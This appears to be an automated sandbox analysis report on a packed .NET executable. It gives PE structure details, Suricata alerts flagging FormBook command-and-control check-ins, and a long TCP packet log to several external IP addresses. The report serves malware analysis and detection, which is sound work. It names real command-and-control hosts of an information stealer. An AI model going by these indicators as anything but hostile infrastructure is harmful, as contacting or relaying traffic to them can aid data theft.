                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xad2d50x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x5fc.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xab8ac0x70.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xab3300xab400b02a95ee6116cacecda19e24c570304fFalse0.9702540488138686data7.973818624888397IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xae0000x5fc0x6007ab2a2ee2c29cdcb95b4bd31e42cfa6eFalse0.4388020833333333data4.244601957483302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xb00000xc0x200d183af30910534a65b0176b447db801cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0xae0900x36cdata0.4235159817351598
                                                              RT_MANIFEST0xae40c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-12T15:30:04.898207+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.749735TCP
                                                              2024-11-12T15:30:43.873121+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.749921TCP
                                                              2024-11-12T15:30:57.257278+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74996585.159.66.9380TCP
                                                              2024-11-12T15:31:21.069853+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74998091.184.0.20080TCP
                                                              2024-11-12T15:31:34.753504+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749984194.9.94.8580TCP
                                                              2024-11-12T15:31:48.572323+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749988170.39.213.4380TCP
                                                              2024-11-12T15:32:01.943439+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74999213.248.169.4880TCP
                                                              2024-11-12T15:32:15.679445+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74999638.47.232.19480TCP
                                                              2024-11-12T15:32:29.198864+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.750000167.172.133.3280TCP
                                                              2024-11-12T15:32:43.135959+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.750005162.0.211.14380TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 12, 2024 15:30:56.313436031 CET4996580192.168.2.785.159.66.93
                                                              Nov 12, 2024 15:30:56.318357944 CET804996585.159.66.93192.168.2.7
                                                              Nov 12, 2024 15:30:56.318576097 CET4996580192.168.2.785.159.66.93
                                                              Nov 12, 2024 15:30:56.327024937 CET4996580192.168.2.785.159.66.93
                                                              Nov 12, 2024 15:30:56.332117081 CET804996585.159.66.93192.168.2.7
                                                              Nov 12, 2024 15:30:57.211643934 CET804996585.159.66.93192.168.2.7
                                                              Nov 12, 2024 15:30:57.257277966 CET4996580192.168.2.785.159.66.93
                                                              Nov 12, 2024 15:30:57.365412951 CET804996585.159.66.93192.168.2.7
                                                              Nov 12, 2024 15:30:57.365609884 CET4996580192.168.2.785.159.66.93
                                                              Nov 12, 2024 15:30:57.404695988 CET4996580192.168.2.785.159.66.93
                                                              Nov 12, 2024 15:30:57.409590006 CET804996585.159.66.93192.168.2.7
                                                              Nov 12, 2024 15:31:12.479840994 CET4997780192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:12.484847069 CET804997791.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:12.484956980 CET4997780192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:12.495757103 CET4997780192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:12.500849962 CET804997791.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:13.333739042 CET804997791.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:13.382356882 CET4997780192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:13.463000059 CET804997791.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:13.463098049 CET4997780192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:14.007586002 CET4997780192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:15.026325941 CET4997880192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:15.031371117 CET804997891.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:15.031502962 CET4997880192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:15.042330027 CET4997880192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:15.047218084 CET804997891.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:15.853849888 CET804997891.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:15.898082972 CET4997880192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:15.970082998 CET804997891.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:15.970309973 CET4997880192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:16.555330038 CET4997880192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:17.598613024 CET4997980192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:17.620774984 CET804997991.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:17.620881081 CET4997980192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:17.633007050 CET4997980192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:17.639267921 CET804997991.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:17.639280081 CET804997991.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:18.436959028 CET804997991.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:18.491744041 CET4997980192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:18.552236080 CET804997991.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:18.552341938 CET4997980192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:19.148119926 CET4997980192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:20.166848898 CET4998080192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:20.171797037 CET804998091.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:20.171979904 CET4998080192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:20.179465055 CET4998080192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:20.184421062 CET804998091.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:21.021104097 CET804998091.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:21.069853067 CET4998080192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:21.149521112 CET804998091.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:21.149713039 CET4998080192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:21.150553942 CET4998080192.168.2.791.184.0.200
                                                              Nov 12, 2024 15:31:21.155354023 CET804998091.184.0.200192.168.2.7
                                                              Nov 12, 2024 15:31:26.242923021 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:26.248764038 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:26.248888969 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:26.259960890 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:26.264976978 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.110738993 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.110759020 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.110773087 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.110964060 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:27.111051083 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.111063957 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.111143112 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:27.231559992 CET8049981194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:27.231628895 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:27.794964075 CET4998180192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:28.811448097 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:28.816373110 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:28.816462994 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:28.827096939 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:28.831939936 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.646936893 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.646962881 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.646977901 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.646991014 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.647005081 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.647017002 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.647089958 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:29.647138119 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:29.767441034 CET8049982194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:29.767556906 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:30.336869001 CET4998280192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:31.354556084 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:31.360169888 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:31.360266924 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:31.371136904 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:31.377191067 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:31.377408981 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234817028 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234837055 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234849930 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234863043 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234877110 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234889030 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.234983921 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:32.235035896 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:32.371464968 CET8049983194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:32.371728897 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:32.882572889 CET4998380192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:33.901127100 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:33.906183958 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:33.906397104 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:33.913113117 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:33.918158054 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753211021 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753319025 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753336906 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753348112 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753365993 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753473043 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753484011 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.753504038 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:34.753562927 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:34.874574900 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:34.874870062 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:34.877856970 CET4998480192.168.2.7194.9.94.85
                                                              Nov 12, 2024 15:31:34.886169910 CET8049984194.9.94.85192.168.2.7
                                                              Nov 12, 2024 15:31:40.248593092 CET4998580192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:40.254906893 CET8049985170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:40.255022049 CET4998580192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:40.265789032 CET4998580192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:40.272727966 CET8049985170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:40.860546112 CET8049985170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:40.861824989 CET8049985170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:40.862004995 CET4998580192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:41.773121119 CET4998580192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:42.791868925 CET4998680192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:42.796773911 CET8049986170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:42.796905041 CET4998680192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:42.807125092 CET4998680192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:42.813153028 CET8049986170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:43.391102076 CET8049986170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:43.392074108 CET8049986170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:43.392151117 CET4998680192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:44.320030928 CET4998680192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:45.339411974 CET4998780192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:45.344261885 CET8049987170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:45.344342947 CET4998780192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:45.357175112 CET4998780192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:45.362168074 CET8049987170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:45.362261057 CET8049987170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:45.950088978 CET8049987170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:45.951569080 CET8049987170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:45.951623917 CET4998780192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:46.871741056 CET4998780192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:47.978785992 CET4998880192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:47.984225035 CET8049988170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:47.985327959 CET4998880192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:47.998218060 CET4998880192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:48.003106117 CET8049988170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:48.571270943 CET8049988170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:48.572268009 CET8049988170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:48.572323084 CET4998880192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:48.574136019 CET4998880192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:48.584887028 CET8049988170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:53.606173038 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:53.611109018 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:53.611821890 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:53.622720957 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:53.627717018 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:54.295245886 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:54.295332909 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:55.133851051 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:55.138959885 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.152630091 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:56.157730103 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.157818079 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:56.172172070 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:56.177426100 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.838399887 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.841881990 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:57.679742098 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:57.684735060 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:58.698931932 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:58.704015017 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:58.704101086 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:58.717658043 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:58.722651005 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:58.722673893 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:59.382127047 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:59.387758017 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:00.226345062 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:00.232407093 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.245770931 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.250840902 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.250979900 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.258341074 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.263485909 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.910918951 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.943325996 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.943439007 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.944662094 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.949579000 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:06.991756916 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:06.996931076 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:06.999980927 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:07.011147022 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:07.015995026 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:07.964400053 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:08.007534027 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:08.143722057 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:08.143805027 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:08.523242950 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.541954994 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.547070980 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:09.549887896 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.562175035 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.567008018 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798329115 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798712015 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798787117 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:10.798813105 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798857927 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:11.070322990 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.089728117 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.094578028 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:12.094652891 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.108653069 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.113588095 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:12.113928080 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:13.051506042 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:13.101809025 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:13.233422995 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:13.233562946 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:13.617829084 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.637378931 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.642704964 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:14.642810106 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.653965950 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.658862114 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:15.630985975 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:15.679445028 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:15.812645912 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:15.812783003 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:15.815757036 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:15.820697069 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:20.838505030 CET4999780192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:20.843285084 CET8049997167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:20.843348980 CET4999780192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:20.857873917 CET4999780192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:20.862869978 CET8049997167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:21.517307043 CET8049997167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:21.557106972 CET8049997167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:21.557370901 CET4999780192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:22.371263027 CET4999780192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:23.385636091 CET4999880192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:23.390496016 CET8049998167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:23.390589952 CET4999880192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:23.402628899 CET4999880192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:23.407577991 CET8049998167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:24.079112053 CET8049998167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:24.113769054 CET8049998167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:24.113881111 CET4999880192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:24.914206028 CET4999880192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:25.933800936 CET4999980192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:25.938715935 CET8049999167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:25.938815117 CET4999980192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:25.958107948 CET4999980192.168.2.7167.172.133.32
